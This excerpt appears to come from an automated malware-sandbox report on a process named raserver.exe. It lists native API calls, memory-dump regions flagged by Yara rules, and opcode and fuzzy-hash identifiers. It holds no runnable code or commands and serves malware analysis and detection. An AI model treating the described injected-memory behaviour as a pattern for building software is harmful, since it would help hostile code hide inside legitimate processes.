                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CFDFA
                                                                              Strings
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017CFE2B
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017CFE01
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                              • Instruction ID: 326d02498f02f25a2659a37cd36b26988af972938c4fd83efcbee36b9d59a2a3
                                                                              • Opcode Fuzzy Hash: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                              • Instruction Fuzzy Hash: 25F0FC72200501BFE6201A45DC05F23FF5ADB44B30F14431CF614561E1D962F86086F0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: raserver.exe PID: 6744 Parent PID: 3440 raserver.exeCOMMON

                                                                              Executed Functions

                                                                              Function 001E9D5D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4B87,007A002E,00000000,00000060,00000000,00000000), ref: 001E9DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`$U
                                                                              • API String ID: 823142352-510634365
                                                                              • Opcode ID: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
                                                                              • Instruction ID: d71ebe19f2ab2f5f41c203d02e3343a82919ba00879d59cf0997e56e3a478170
                                                                              • Opcode Fuzzy Hash: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
                                                                              • Instruction Fuzzy Hash: 8801B2B2204608ABCB08CF88DC95EEB37E9AF8C754F158248FA1D97241C630E811CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4B87,007A002E,00000000,00000060,00000000,00000000), ref: 001E9DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`
                                                                              • API String ID: 823142352-1441809116
                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction ID: 2b7f2a0e27e4ef62852fb98ced7abf918ab0d3263fb53bb5abe6b51c829fdb98
                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction Fuzzy Hash: ADF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630F811CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9E0B, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(001E4D42,5EB6522D,FFFFFFFF,001E4A01,?,?,001E4D42,?,001E4A01,FFFFFFFF,5EB6522D,001E4D42,?,00000000), ref: 001E9E55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
                                                                              • Instruction ID: a931f728af96581da39bc89f01db5da296e134a26ff71dfef72bef38a1f428cb
                                                                              • Opcode Fuzzy Hash: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
                                                                              • Instruction Fuzzy Hash: DBF0E2B2200108ABCB04CF99DC80EEB77ADEF8C354F168248BA0DA7251C630E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(001E4D42,5EB6522D,FFFFFFFF,001E4A01,?,?,001E4D42,?,001E4A01,FFFFFFFF,5EB6522D,001E4D42,?,00000000), ref: 001E9E55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction ID: 1d42c697143f6ddfc3d7ab8e050e72380578c95b92d8a19d5c6c26251df0c769
                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction Fuzzy Hash: D7F0A9B2200108ABCB14DF89DC81DEB77ADEF8C754F158248BA1D97241D630E811CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9F3A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001D2D11,00002000,00003000,00000004), ref: 001E9F79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
                                                                              • Instruction ID: 0f2e20623a7d9ea583b97ca08321e0b9a31258bbef00ad7cf5d067e1455477bd
                                                                              • Opcode Fuzzy Hash: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
                                                                              • Instruction Fuzzy Hash: E6F01CB1200209AFCB14DF99CC81EEBB7ADEF88754F118149FE5897241C630F921CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001D2D11,00002000,00003000,00000004), ref: 001E9F79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction ID: 277dc45b5c8566637c4ed452ca3233176a08d23db2ce45c65be7a1d7b3eae69d
                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction Fuzzy Hash: 5BF015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE08A7241C630F810CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9E8A, Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(001E4D20,?,?,001E4D20,00000000,FFFFFFFF), ref: 001E9EB5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
                                                                              • Instruction ID: a3122f67d2a982444991b7caa26036442c92e81461fbd7bf9767845a0a0d1dfd
                                                                              • Opcode Fuzzy Hash: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
                                                                              • Instruction Fuzzy Hash: AEE08675100218BBD724DB94CC85EA77B5CEF48B50F154455BA189BA42D630F50086D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001E9E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(001E4D20,?,?,001E4D20,00000000,FFFFFFFF), ref: 001E9EB5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction ID: ce8480c391f892b8f42b0029ae4566a4366c7f259a22a9545780907d8489520b
                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction Fuzzy Hash: 90D01275200214ABD710EB99CC85E97775CEF44750F154455BA585B242C530F50086E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: a98a218c0f1cec1b2d7e78f54709078f29bec7c462596bbc5d1a66a9bbe69160
                                                                              • Instruction ID: 76c3b7939a233953dc2a60bbd7d8ce0ca452818d5398600413e515310ae2feb8
                                                                              • Opcode Fuzzy Hash: a98a218c0f1cec1b2d7e78f54709078f29bec7c462596bbc5d1a66a9bbe69160
                                                                              • Instruction Fuzzy Hash: C8900261282041527545B1595404507445ABBE0285791C022A1406950C8566E85AF661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b01d01c1efd30a87efb3e06e500c9ad72ef3439897012a4a51da23b7d15b9673
                                                                              • Instruction ID: 0a44d3b32c46c3032ee9372365f95dbce80d22de3b4a7d4d18ed1314837dcbed
                                                                              • Opcode Fuzzy Hash: b01d01c1efd30a87efb3e06e500c9ad72ef3439897012a4a51da23b7d15b9673
                                                                              • Instruction Fuzzy Hash: 7A90027124100413F11161595504707045DABD0285F91C422A0416558D9696D956B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e26c726f7a19985ca15348803acb8fcca2a440f28112b37a27456ef85432632f
                                                                              • Instruction ID: 00179230482f3ce261e034dac984b87a34a9ca23906f9c32b72807d8b3db00f0
                                                                              • Opcode Fuzzy Hash: e26c726f7a19985ca15348803acb8fcca2a440f28112b37a27456ef85432632f
                                                                              • Instruction Fuzzy Hash: AB900265251000033105A5591704507049AABD5395351C031F1007550CD661D8657161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: a13dc53223d5372538729cf6204f6877bb3b1ca8273500ae26ecbf20d630270e
                                                                              • Instruction ID: 0c401512e90b1896d20fc65f05e5eadba5eac4726435783cd54967243a1ce97c
                                                                              • Opcode Fuzzy Hash: a13dc53223d5372538729cf6204f6877bb3b1ca8273500ae26ecbf20d630270e
                                                                              • Instruction Fuzzy Hash: A49002B124100402F140715954047460459ABD0345F51C021A5056554E8699DDD976A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 045695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 39abd26fae3fcafe6590064d6e140fe7c4121800d913a7059721258b945954d1
                                                                              • Instruction ID: 88fbf893da3b1ba308d6a3c59fb2f888d327e5efac251d9056081cda4fc59ac2
                                                                              • Opcode Fuzzy Hash: 39abd26fae3fcafe6590064d6e140fe7c4121800d913a7059721258b945954d1
                                                                              • Instruction Fuzzy Hash: 5A9002A124200003710571595414616445EABE0245B51C031E1006590DC565D8957165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 045699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 19e7dc4fea3b53867dea1e08635295098fd5f474b2deec532598a62d4f9487ee
                                                                              • Instruction ID: 9af4bcc0c84d776056dd0b1fe2f6cc03e9c82349b1b81d28fe436c5628f702fc
                                                                              • Opcode Fuzzy Hash: 19e7dc4fea3b53867dea1e08635295098fd5f474b2deec532598a62d4f9487ee
                                                                              • Instruction Fuzzy Hash: 6A9002A138100442F10061595414B060459EBE1345F51C025E1056554D8659DC567166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 11b00f1fdda337b82bc1929bec4bc4ac7bc16a144c935e4eac8aa6e37a145d83
                                                                              • Instruction ID: e664c230436423c59647e275a7035df361d581bb2c8834e64ba407567a466c33
                                                                              • Opcode Fuzzy Hash: 11b00f1fdda337b82bc1929bec4bc4ac7bc16a144c935e4eac8aa6e37a145d83
                                                                              • Instruction Fuzzy Hash: 0F90027124504842F14071595404A460469ABD0349F51C021A0056694D9665DD59B6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6597e7c308292cda9826432d72632b9a2f877636800368968238871a453c42a7
                                                                              • Instruction ID: 4531b8bf014f1364a1bf1d9354a8217e0bbc2c8d069435f45b578eabe8b5c182
                                                                              • Opcode Fuzzy Hash: 6597e7c308292cda9826432d72632b9a2f877636800368968238871a453c42a7
                                                                              • Instruction Fuzzy Hash: 8B90026125180042F20065695C14B070459ABD0347F51C125A0146554CC955D8657561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c21ba2da598fc9ff28336e6702762b4b1b06127ec16cf4739c182165de684f6d
                                                                              • Instruction ID: d0115d59dfa22de1bc32a7cda59a61253d0168cbcf4d2c1e826e356374270d81
                                                                              • Opcode Fuzzy Hash: c21ba2da598fc9ff28336e6702762b4b1b06127ec16cf4739c182165de684f6d
                                                                              • Instruction Fuzzy Hash: FF90027124100802F1807159540464A0459ABD1345F91C025A0017654DCA55DA5D77E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 045696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6d18678a76a55465a544052c2df1cde405be571eb992a7b4a1a61fae7fdd7e99
                                                                              • Instruction ID: 216c7d3c73aff51e90ef2f39ef2240a8a272e1eacfdb7bd8066d2b2632bcdceb
                                                                              • Opcode Fuzzy Hash: 6d18678a76a55465a544052c2df1cde405be571eb992a7b4a1a61fae7fdd7e99
                                                                              • Instruction Fuzzy Hash: A090027124100842F10061595404B460459ABE0345F51C026A0116654D8655D8557561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 045696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d62504d1c9551dd56b5580760e91d6258bb0032f2aa4747398ce7f27a66c3b2a
                                                                              • Instruction ID: 7a09fc8276e0ec7c5bdda9bd73078f7f9786d773dc647df648e3edf8fea052ac
                                                                              • Opcode Fuzzy Hash: d62504d1c9551dd56b5580760e91d6258bb0032f2aa4747398ce7f27a66c3b2a
                                                                              • Instruction Fuzzy Hash: FF90027124108802F1106159940474A0459ABD0345F55C421A4416658D86D5D8957161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 94dc1db7b00baee102bdf33729d475bfd4246cf7c23f0d6f272675bbf1060c09
                                                                              • Instruction ID: daae8f4b0de0b3253dc9b5525447c16ad489550259db11e4a73d8e875fd86a91
                                                                              • Opcode Fuzzy Hash: 94dc1db7b00baee102bdf33729d475bfd4246cf7c23f0d6f272675bbf1060c09
                                                                              • Instruction Fuzzy Hash: 3190027124100402F100659964086460459ABE0345F51D021A5016555EC6A5D8957171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 180bbc5c7cd1459f9abbda4af03b6fb83faed8f3fc4506e286625e018b82f31b
                                                                              • Instruction ID: e37991fe5d5dabc23d47abf000b245982d7aa890afd6aa2cde4e9ef5dfb0d758
                                                                              • Opcode Fuzzy Hash: 180bbc5c7cd1459f9abbda4af03b6fb83faed8f3fc4506e286625e018b82f31b
                                                                              • Instruction Fuzzy Hash: 0A90027135114402F110615994047060459ABD1245F51C421A0816558D86D5D8957162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04569780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5f1b3ddeb895c7ae91edfeff6aa1b7a8542993b99f889e289dda8acdedb4f258
                                                                              • Instruction ID: 3f74751f387c6a9efd6da44153893ed960521f9f4bfe3e9b95f3cf45f0dfb685
                                                                              • Opcode Fuzzy Hash: 5f1b3ddeb895c7ae91edfeff6aa1b7a8542993b99f889e289dda8acdedb4f258
                                                                              • Instruction Fuzzy Hash: 7F90026925300002F1807159640860A0459ABD1246F91D425A0007558CC955D86D7361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA069, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA09D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 035705fb713529143faa7298760893f3409cc2520eea19be97e2496a14905d83
                                                                              • Instruction ID: eb9cfe43966d09341548d2aaa8ca77a59c89ad7a7378a0dcfdedf867ec156573
                                                                              • Opcode Fuzzy Hash: 035705fb713529143faa7298760893f3409cc2520eea19be97e2496a14905d83
                                                                              • Instruction Fuzzy Hash: 82E0ED712102046BD714DF55CC85EA777ADEF89650F018554B94857642C630E914CBB0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA09D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction ID: d4a7b66ed3439ce2bb0fb5bb6f54957e09127defaabd6ebdc9682ddbf827291e
                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction Fuzzy Hash: 3EE04FB1200208ABD714DF59CC45EA777ACEF88750F018554FD0857242C630F910CAF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001D82EA, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D834A
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D836B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: bfe67b6ecb5fbd18be35f6894dd5178036d844c2eead9a875a44bac1cac2aa21
                                                                              • Instruction ID: 8465d59b9b64b002d05375586a15514bea11a398d571e64329d7675a5ea077c7
                                                                              • Opcode Fuzzy Hash: bfe67b6ecb5fbd18be35f6894dd5178036d844c2eead9a875a44bac1cac2aa21
                                                                              • Instruction Fuzzy Hash: 4E01F731A806287AEB20A6959C43FFE772CAF10F55F044159FB04BA2C1DBA4690687E6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

